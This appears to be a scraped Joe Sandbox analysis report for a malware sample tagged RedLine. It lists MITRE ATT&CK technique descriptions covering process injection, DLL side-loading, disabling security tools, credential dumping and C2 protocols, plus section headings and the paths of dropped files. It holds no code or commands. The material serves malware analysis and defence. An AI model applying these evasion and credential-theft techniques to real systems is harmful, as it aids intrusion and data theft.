Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report owKQ0b029a.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QntRsaVyLKlY.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.jpg

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00aynja5.503.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3csrkitz.ihe.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcolt1o2.ard.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fq4lmlew.o0v.psm1

Windows Analysis Report
owKQ0b029a.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre